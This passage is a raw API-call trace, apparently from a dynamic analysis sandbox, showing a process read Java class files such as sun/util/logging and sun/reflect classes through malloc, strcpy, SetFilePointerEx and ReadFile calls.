(_Size=0x48) returned 0x12e5ef20 [0128.273] malloc (_Size=0xa0) returned 0x12dab260 [0128.273] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3412eb7, lpNewFilePointer=0x208c500, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c500*=54603447) returned 1 [0128.273] ReadFile (in: hFile=0x134, lpBuffer=0x12dab260, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c4d0, lpOverlapped=0x0 | out: lpBuffer=0x12dab260*, lpNumberOfBytesRead=0x208c4d0*=0xa0, lpOverlapped=0x0) returned 1 [0128.274] malloc (_Size=0x2b) returned 0x12ef4c90 [0128.274] strlen (_Str="java/util/concurrent/locks/Condition.class") returned 0x2a [0128.274] strcpy (in: _Dest=0x208c680, _Source="java/util/concurrent/locks/Condition.class" | out: _Dest="java/util/concurrent/locks/Condition.class") returned="java/util/concurrent/locks/Condition.class" [0128.274] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe2c58, lpNewFilePointer=0x208c100, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c100*=50211928) returned 1 [0128.274] ReadFile (in: hFile=0x134, lpBuffer=0x208c150, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c0d0, lpOverlapped=0x0 | out: lpBuffer=0x208c150*, lpNumberOfBytesRead=0x208c0d0*=0x1e, lpOverlapped=0x0) returned 1 [0128.274] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe2ca0, lpNewFilePointer=0x208c160, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c160*=50212000) returned 1 [0128.274] ReadFile (in: hFile=0x134, lpBuffer=0x1227b890, nNumberOfBytesToRead=0x180, lpNumberOfBytesRead=0x208c130, lpOverlapped=0x0 | out: lpBuffer=0x1227b890*, lpNumberOfBytesRead=0x208c130*=0x180, lpOverlapped=0x0) returned 1 [0128.275] free (_Block=0x12ee9080) [0128.275] free (_Block=0x12e5f330) [0128.289] strlen (_Str="sun/misc/SoftCache.class") returned 0x18 [0128.289] malloc (_Size=0x48) returned 0x12e5f420 [0128.289] malloc (_Size=0xa0) returned 0x12dac860 [0128.289] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3412e71, lpNewFilePointer=0x208d070, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d070*=54603377) returned 1 [0128.289] ReadFile (in: hFile=0x134, lpBuffer=0x12dac860, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d040, lpOverlapped=0x0 | out: lpBuffer=0x12dac860*, lpNumberOfBytesRead=0x208d040*=0xa0, lpOverlapped=0x0) returned 1 [0128.289] malloc (_Size=0x19) returned 0x12ddada0 [0128.290] strlen (_Str="sun/misc/SoftCache.class") returned 0x18 [0128.290] strcpy (in: _Dest=0x208d1f0, _Source="sun/misc/SoftCache.class" | out: _Dest="sun/misc/SoftCache.class") returned="sun/misc/SoftCache.class" [0128.290] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe2204, lpNewFilePointer=0x208cc70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc70*=50209284) returned 1 [0128.290] ReadFile (in: hFile=0x134, lpBuffer=0x208ccc0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc40, lpOverlapped=0x0 | out: lpBuffer=0x208ccc0*, lpNumberOfBytesRead=0x208cc40*=0x1e, lpOverlapped=0x0) returned 1 [0128.290] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe223a, lpNewFilePointer=0x208ccd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccd0*=50209338) returned 1 [0128.290] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0xa1e, lpNumberOfBytesRead=0x208cca0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208cca0*=0xa1e, lpOverlapped=0x0) returned 1 [0128.290] free (_Block=0x12ef4c90) [0128.291] free (_Block=0x12e5ef20) [0128.297] malloc (_Size=0x48) returned 0x12e5f010 [0128.297] malloc (_Size=0xa0) returned 0x12dab310 [0128.297] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341741a, lpNewFilePointer=0x208cf30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cf30*=54621210) returned 1 [0128.297] ReadFile (in: hFile=0x134, lpBuffer=0x12dab310, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cf00, lpOverlapped=0x0 | out: lpBuffer=0x12dab310*, lpNumberOfBytesRead=0x208cf00*=0xa0, lpOverlapped=0x0) returned 1 [0128.297] malloc (_Size=0x26) returned 0x12dda860 [0128.298] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30aa30e, lpNewFilePointer=0x208cb30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cb30*=51028750) returned 1 [0128.298] ReadFile (in: hFile=0x134, lpBuffer=0x208cb80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cb00, lpOverlapped=0x0 | out: lpBuffer=0x208cb80*, lpNumberOfBytesRead=0x208cb00*=0x1e, lpOverlapped=0x0) returned 1 [0128.300] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30aa351, lpNewFilePointer=0x208cb90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cb90*=51028817) returned 1 [0128.300] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x13cb, lpNumberOfBytesRead=0x208cb60, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208cb60*=0x13cb, lpOverlapped=0x0) returned 1 [0128.301] malloc (_Size=0x48) returned 0x12e5f790 [0128.301] malloc (_Size=0xa0) returned 0x12dab9f0 [0128.301] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34173c1, lpNewFilePointer=0x208c760, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c760*=54621121) returned 1 [0128.301] ReadFile (in: hFile=0x134, lpBuffer=0x12dab9f0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c730, lpOverlapped=0x0 | out: lpBuffer=0x12dab9f0*, lpNumberOfBytesRead=0x208c730*=0xa0, lpOverlapped=0x0) returned 1 [0128.302] malloc (_Size=0x2c) returned 0x12ef4c90 [0128.302] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30a9ba4, lpNewFilePointer=0x208c360, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c360*=51026852) returned 1 [0128.302] ReadFile (in: hFile=0x134, lpBuffer=0x208c3b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c330, lpOverlapped=0x0 | out: lpBuffer=0x208c3b0*, lpNumberOfBytesRead=0x208c330*=0x1e, lpOverlapped=0x0) returned 1 [0128.303] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30a9bed, lpNewFilePointer=0x208c3c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c3c0*=51026925) returned 1 [0128.303] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x721, lpNumberOfBytesRead=0x208c390, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c390*=0x721, lpOverlapped=0x0) returned 1 [0128.304] malloc (_Size=0x48) returned 0x12e5ffb0 [0128.304] malloc (_Size=0xa0) returned 0x12dac650 [0128.304] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341736c, lpNewFilePointer=0x208c8a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c8a0*=54621036) returned 1 [0128.304] ReadFile (in: hFile=0x134, lpBuffer=0x12dac650, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c870, lpOverlapped=0x0 | out: lpBuffer=0x12dac650*, lpNumberOfBytesRead=0x208c870*=0xa0, lpOverlapped=0x0) returned 1 [0128.304] malloc (_Size=0x28) returned 0x12ddaf80 [0128.305] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30a9836, lpNewFilePointer=0x208c4a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c4a0*=51025974) returned 1 [0128.305] ReadFile (in: hFile=0x134, lpBuffer=0x208c4f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c470, lpOverlapped=0x0 | out: lpBuffer=0x208c4f0*, lpNumberOfBytesRead=0x208c470*=0x1e, lpOverlapped=0x0) returned 1 [0128.305] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30a987b, lpNewFilePointer=0x208c500, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c500*=51026043) returned 1 [0128.305] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x329, lpNumberOfBytesRead=0x208c4d0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c4d0*=0x329, lpOverlapped=0x0) returned 1 [0128.307] strlen (_Str="sun/util/logging/PlatformLogger$DefaultLoggerProxy") returned 0x32 [0128.308] strlen (_Str="sun/util/logging/PlatformLogger$DefaultLoggerProxy.class") returned 0x38 [0128.308] malloc (_Size=0x48) returned 0x12e5f830 [0128.308] malloc (_Size=0xa0) returned 0x12dab260 [0128.308] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3417306, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=54620934) returned 1 [0128.308] ReadFile (in: hFile=0x134, lpBuffer=0x12dab260, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x12dab260*, lpNumberOfBytesRead=0x208cd90*=0xa0, lpOverlapped=0x0) returned 1 [0128.308] malloc (_Size=0x39) returned 0x12e5f8d0 [0128.308] strlen (_Str="sun/util/logging/PlatformLogger$DefaultLoggerProxy.class") returned 0x38 [0128.308] strcpy (in: _Dest=0x208cf40, _Source="sun/util/logging/PlatformLogger$DefaultLoggerProxy.class" | out: _Dest="sun/util/logging/PlatformLogger$DefaultLoggerProxy.class") returned="sun/util/logging/PlatformLogger$DefaultLoggerProxy.class" [0128.309] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30a88d0, lpNewFilePointer=0x208c9c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c9c0*=51022032) returned 1 [0128.309] ReadFile (in: hFile=0x134, lpBuffer=0x208ca10, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c990, lpOverlapped=0x0 | out: lpBuffer=0x208ca10*, lpNumberOfBytesRead=0x208c990*=0x1e, lpOverlapped=0x0) returned 1 [0128.310] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30a8926, lpNewFilePointer=0x208ca20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca20*=51022118) returned 1 [0128.310] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0xf10, lpNumberOfBytesRead=0x208c9f0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c9f0*=0xf10, lpOverlapped=0x0) returned 1 [0128.310] free (_Block=0x12ddaf80) [0128.311] free (_Block=0x12e5ffb0) [0128.312] malloc (_Size=0x48) returned 0x12e5f150 [0128.312] malloc (_Size=0xa0) returned 0x12dabb50 [0128.312] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34172a7, lpNewFilePointer=0x208c380, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c380*=54620839) returned 1 [0128.312] ReadFile (in: hFile=0x134, lpBuffer=0x12dabb50, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c350, lpOverlapped=0x0 | out: lpBuffer=0x12dabb50*, lpNumberOfBytesRead=0x208c350*=0xa0, lpOverlapped=0x0) returned 1 [0128.312] malloc (_Size=0x32) returned 0x12ef4c90 [0128.312] strlen (_Str="sun/util/logging/PlatformLogger$LoggerProxy.class") returned 0x31 [0128.312] strcpy (in: _Dest=0x208c500, _Source="sun/util/logging/PlatformLogger$LoggerProxy.class" | out: _Dest="sun/util/logging/PlatformLogger$LoggerProxy.class") returned="sun/util/logging/PlatformLogger$LoggerProxy.class" [0128.312] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30a852b, lpNewFilePointer=0x208bf80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf80*=51021099) returned 1 [0128.313] ReadFile (in: hFile=0x134, lpBuffer=0x208bfd0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bf50, lpOverlapped=0x0 | out: lpBuffer=0x208bfd0*, lpNumberOfBytesRead=0x208bf50*=0x1e, lpOverlapped=0x0) returned 1 [0128.313] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30a857a, lpNewFilePointer=0x208bfe0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bfe0*=51021178) returned 1 [0128.313] ReadFile (in: hFile=0x134, lpBuffer=0x1227b550, nNumberOfBytesToRead=0x356, lpNumberOfBytesRead=0x208bfb0, lpOverlapped=0x0 | out: lpBuffer=0x1227b550*, lpNumberOfBytesRead=0x208bfb0*=0x356, lpOverlapped=0x0) returned 1 [0128.313] free (_Block=0x12e5f8d0) [0128.313] free (_Block=0x12e5f830) [0128.314] strlen (_Str="sun/util/logging/PlatformLogger$JavaLoggerProxy") returned 0x2f [0128.315] strlen (_Str="sun/util/logging/PlatformLogger$JavaLoggerProxy.class") returned 0x35 [0128.315] malloc (_Size=0x48) returned 0x12e5ff10 [0128.315] malloc (_Size=0xa0) returned 0x12dab890 [0128.315] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3417244, lpNewFilePointer=0x208cdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdc0*=54620740) returned 1 [0128.315] ReadFile (in: hFile=0x134, lpBuffer=0x12dab890, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd90, lpOverlapped=0x0 | out: lpBuffer=0x12dab890*, lpNumberOfBytesRead=0x208cd90*=0xa0, lpOverlapped=0x0) returned 1 [0128.315] malloc (_Size=0x36) returned 0x12ef4cd0 [0128.315] strlen (_Str="sun/util/logging/PlatformLogger$JavaLoggerProxy.class") returned 0x35 [0128.315] strcpy (in: _Dest=0x208cf40, _Source="sun/util/logging/PlatformLogger$JavaLoggerProxy.class" | out: _Dest="sun/util/logging/PlatformLogger$JavaLoggerProxy.class") returned="sun/util/logging/PlatformLogger$JavaLoggerProxy.class" [0128.315] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30a7a4b, lpNewFilePointer=0x208c9c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c9c0*=51018315) returned 1 [0128.315] ReadFile (in: hFile=0x134, lpBuffer=0x208ca10, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c990, lpOverlapped=0x0 | out: lpBuffer=0x208ca10*, lpNumberOfBytesRead=0x208c990*=0x1e, lpOverlapped=0x0) returned 1 [0128.316] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30a7a9e, lpNewFilePointer=0x208ca20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca20*=51018398) returned 1 [0128.316] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0xa8d, lpNumberOfBytesRead=0x208c9f0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c9f0*=0xa8d, lpOverlapped=0x0) returned 1 [0128.318] free (_Block=0x12ef4c90) [0128.318] free (_Block=0x12e5f150) [0128.326] strlen (_Str="sun/util/logging/LoggingSupport.class") returned 0x25 [0128.326] malloc (_Size=0x48) returned 0x12e5f380 [0128.326] malloc (_Size=0xa0) returned 0x12dab260 [0128.326] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34171f1, lpNewFilePointer=0x208c840, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c840*=54620657) returned 1 [0128.326] ReadFile (in: hFile=0x134, lpBuffer=0x12dab260, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c810, lpOverlapped=0x0 | out: lpBuffer=0x12dab260*, lpNumberOfBytesRead=0x208c810*=0xa0, lpOverlapped=0x0) returned 1 [0128.326] malloc (_Size=0x26) returned 0x12dda650 [0128.327] strlen (_Str="sun/util/logging/LoggingSupport.class") returned 0x25 [0128.327] strcpy (in: _Dest=0x208c9c0, _Source="sun/util/logging/LoggingSupport.class" | out: _Dest="sun/util/logging/LoggingSupport.class") returned="sun/util/logging/LoggingSupport.class" [0128.327] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30a6e82, lpNewFilePointer=0x208c440, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c440*=51015298) returned 1 [0128.327] ReadFile (in: hFile=0x134, lpBuffer=0x208c490, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c410, lpOverlapped=0x0 | out: lpBuffer=0x208c490*, lpNumberOfBytesRead=0x208c410*=0x1e, lpOverlapped=0x0) returned 1 [0128.328] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30a6ec5, lpNewFilePointer=0x208c4a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c4a0*=51015365) returned 1 [0128.328] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0xb86, lpNumberOfBytesRead=0x208c470, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c470*=0xb86, lpOverlapped=0x0) returned 1 [0128.329] free (_Block=0x12ef4cd0) [0128.329] free (_Block=0x12e5ff10) [0128.338] strlen (_Str="sun/util/logging/LoggingSupport$1.class") returned 0x27 [0128.338] malloc (_Size=0x48) returned 0x12e600f0 [0128.338] malloc (_Size=0xa0) returned 0x12daaef0 [0128.338] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341719c, lpNewFilePointer=0x208c1c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c1c0*=54620572) returned 1 [0128.338] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c190, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208c190*=0xa0, lpOverlapped=0x0) returned 1 [0128.338] malloc (_Size=0x28) returned 0x12dda9e0 [0128.339] strlen (_Str="sun/util/logging/LoggingSupport$1.class") returned 0x27 [0128.339] strcpy (in: _Dest=0x208c340, _Source="sun/util/logging/LoggingSupport$1.class" | out: _Dest="sun/util/logging/LoggingSupport$1.class") returned="sun/util/logging/LoggingSupport$1.class" [0128.339] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30a698f, lpNewFilePointer=0x208bdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bdc0*=51014031) returned 1 [0128.339] ReadFile (in: hFile=0x134, lpBuffer=0x208be10, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bd90, lpOverlapped=0x0 | out: lpBuffer=0x208be10*, lpNumberOfBytesRead=0x208bd90*=0x1e, lpOverlapped=0x0) returned 1 [0128.339] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30a69d4, lpNewFilePointer=0x208be20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208be20*=51014100) returned 1 [0128.339] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x4ae, lpNumberOfBytesRead=0x208bdf0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208bdf0*=0x4ae, lpOverlapped=0x0) returned 1 [0128.340] free (_Block=0x12dda650) [0128.340] free (_Block=0x12e5f380) [0128.345] strlen (_Str="java/util/logging/LoggingProxyImpl") returned 0x22 [0128.346] strlen (_Str="java/util/logging/LoggingProxyImpl.class") returned 0x28 [0128.346] malloc (_Size=0x48) returned 0x12e5f240 [0128.346] malloc (_Size=0xa0) returned 0x12dac9c0 [0128.346] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3417146, lpNewFilePointer=0x208ba60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ba60*=54620486) returned 1 [0128.346] ReadFile (in: hFile=0x134, lpBuffer=0x12dac9c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ba30, lpOverlapped=0x0 | out: lpBuffer=0x12dac9c0*, lpNumberOfBytesRead=0x208ba30*=0xa0, lpOverlapped=0x0) returned 1 [0128.346] malloc (_Size=0x29) returned 0x12ef4cd0 [0128.347] strlen (_Str="java/util/logging/LoggingProxyImpl.class") returned 0x28 [0128.347] strcpy (in: _Dest=0x208bbe0, _Source="java/util/logging/LoggingProxyImpl.class" | out: _Dest="java/util/logging/LoggingProxyImpl.class") returned="java/util/logging/LoggingProxyImpl.class" [0128.347] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30a5e64, lpNewFilePointer=0x208b660, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b660*=51011172) returned 1 [0128.347] ReadFile (in: hFile=0x134, lpBuffer=0x208b6b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b630, lpOverlapped=0x0 | out: lpBuffer=0x208b6b0*, lpNumberOfBytesRead=0x208b630*=0x1e, lpOverlapped=0x0) returned 1 [0128.347] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30a5eaa, lpNewFilePointer=0x208b6c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b6c0*=51011242) returned 1 [0128.347] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0xae5, lpNumberOfBytesRead=0x208b690, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208b690*=0xae5, lpOverlapped=0x0) returned 1 [0128.348] malloc (_Size=0x48) returned 0x12e5f830 [0128.348] malloc (_Size=0xa0) returned 0x12daace0 [0128.348] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34170f5, lpNewFilePointer=0x208afa0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208afa0*=54620405) returned 1 [0128.348] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208af70, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208af70*=0xa0, lpOverlapped=0x0) returned 1 [0128.348] malloc (_Size=0x24) returned 0x12ddabf0 [0128.348] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30a5a3a, lpNewFilePointer=0x208aba0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208aba0*=51010106) returned 1 [0128.348] ReadFile (in: hFile=0x134, lpBuffer=0x208abf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ab70, lpOverlapped=0x0 | out: lpBuffer=0x208abf0*, lpNumberOfBytesRead=0x208ab70*=0x1e, lpOverlapped=0x0) returned 1 [0128.349] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30a5a7b, lpNewFilePointer=0x208ac00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ac00*=51010171) returned 1 [0128.349] ReadFile (in: hFile=0x134, lpBuffer=0x1227b100, nNumberOfBytesToRead=0x3e9, lpNumberOfBytesRead=0x208abd0, lpOverlapped=0x0 | out: lpBuffer=0x1227b100*, lpNumberOfBytesRead=0x208abd0*=0x3e9, lpOverlapped=0x0) returned 1 [0128.351] strlen (_Str="sun/reflect/UnsafeQualifiedStaticObjectFieldAccessorImpl.class") returned 0x3e [0128.351] malloc (_Size=0x48) returned 0x12e60000 [0128.351] malloc (_Size=0xa0) returned 0x12dabf70 [0128.351] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341702f, lpNewFilePointer=0x208b310, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b310*=54620207) returned 1 [0128.351] ReadFile (in: hFile=0x134, lpBuffer=0x12dabf70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b2e0, lpOverlapped=0x0 | out: lpBuffer=0x12dabf70*, lpNumberOfBytesRead=0x208b2e0*=0xa0, lpOverlapped=0x0) returned 1 [0128.352] malloc (_Size=0x3f) returned 0x12e5f9c0 [0128.352] strlen (_Str="sun/reflect/UnsafeQualifiedStaticObjectFieldAccessorImpl.class") returned 0x3e [0128.352] strcpy (in: _Dest=0x208b490, _Source="sun/reflect/UnsafeQualifiedStaticObjectFieldAccessorImpl.class" | out: _Dest="sun/reflect/UnsafeQualifiedStaticObjectFieldAccessorImpl.class") returned="sun/reflect/UnsafeQualifiedStaticObjectFieldAccessorImpl.class" [0128.352] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30a3e7d, lpNewFilePointer=0x208af10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208af10*=51003005) returned 1 [0128.352] ReadFile (in: hFile=0x134, lpBuffer=0x208af60, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208aee0, lpOverlapped=0x0 | out: lpBuffer=0x208af60*, lpNumberOfBytesRead=0x208aee0*=0x1e, lpOverlapped=0x0) returned 1 [0128.352] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30a3ed9, lpNewFilePointer=0x208af70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208af70*=51003097) returned 1 [0128.352] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0xbe1, lpNumberOfBytesRead=0x208af40, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208af40*=0xbe1, lpOverlapped=0x0) returned 1 [0128.353] free (_Block=0x12ddabf0) [0128.353] free (_Block=0x12e5f830) [0128.359] strlen (_Str="sun/reflect/UnsafeQualifiedStaticFieldAccessorImpl.class") returned 0x38 [0128.359] malloc (_Size=0x48) returned 0x12e5f6a0 [0128.359] malloc (_Size=0xa0) returned 0x12dabc00 [0128.359] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3416fc9, lpNewFilePointer=0x208a8d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a8d0*=54620105) returned 1 [0128.359] ReadFile (in: hFile=0x134, lpBuffer=0x12dabc00, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208a8a0, lpOverlapped=0x0 | out: lpBuffer=0x12dabc00*, lpNumberOfBytesRead=0x208a8a0*=0xa0, lpOverlapped=0x0) returned 1 [0128.359] malloc (_Size=0x39) returned 0x12e5fdd0 [0128.359] strlen (_Str="sun/reflect/UnsafeQualifiedStaticFieldAccessorImpl.class") returned 0x38 [0128.359] strcpy (in: _Dest=0x208aa50, _Source="sun/reflect/UnsafeQualifiedStaticFieldAccessorImpl.class" | out: _Dest="sun/reflect/UnsafeQualifiedStaticFieldAccessorImpl.class") returned="sun/reflect/UnsafeQualifiedStaticFieldAccessorImpl.class" [0128.360] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30a3d07, lpNewFilePointer=0x208a4d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a4d0*=51002631) returned 1 [0128.360] ReadFile (in: hFile=0x134, lpBuffer=0x208a520, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208a4a0, lpOverlapped=0x0 | out: lpBuffer=0x208a520*, lpNumberOfBytesRead=0x208a4a0*=0x1e, lpOverlapped=0x0) returned 1 [0128.360] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30a3d5d, lpNewFilePointer=0x208a530, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a530*=51002717) returned 1 [0128.360] ReadFile (in: hFile=0x134, lpBuffer=0x1227b250, nNumberOfBytesToRead=0x120, lpNumberOfBytesRead=0x208a500, lpOverlapped=0x0 | out: lpBuffer=0x1227b250*, lpNumberOfBytesRead=0x208a500*=0x120, lpOverlapped=0x0) returned 1 [0128.360] free (_Block=0x12e5f9c0) [0128.361] free (_Block=0x12e60000) [0128.369] strlen (_Str="sun/util/logging/LoggingSupport$2.class") returned 0x27 [0128.370] malloc (_Size=0x48) returned 0x12e5ed90 [0128.370] malloc (_Size=0xa0) returned 0x12dabc00 [0128.370] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3416f74, lpNewFilePointer=0x208ca90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca90*=54620020) returned 1 [0128.370] ReadFile (in: hFile=0x134, lpBuffer=0x12dabc00, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca60, lpOverlapped=0x0 | out: lpBuffer=0x12dabc00*, lpNumberOfBytesRead=0x208ca60*=0xa0, lpOverlapped=0x0) returned 1 [0128.370] malloc (_Size=0x28) returned 0x12dda9e0 [0128.370] strlen (_Str="sun/util/logging/LoggingSupport$2.class") returned 0x27 [0128.370] strcpy (in: _Dest=0x208cc10, _Source="sun/util/logging/LoggingSupport$2.class" | out: _Dest="sun/util/logging/LoggingSupport$2.class") returned="sun/util/logging/LoggingSupport$2.class" [0128.370] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30a3a1a, lpNewFilePointer=0x208c690, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c690*=51001882) returned 1 [0128.371] ReadFile (in: hFile=0x134, lpBuffer=0x208c6e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c660, lpOverlapped=0x0 | out: lpBuffer=0x208c6e0*, lpNumberOfBytesRead=0x208c660*=0x1e, lpOverlapped=0x0) returned 1 [0128.371] SetFilePointerEx (in: hFile=0x134, 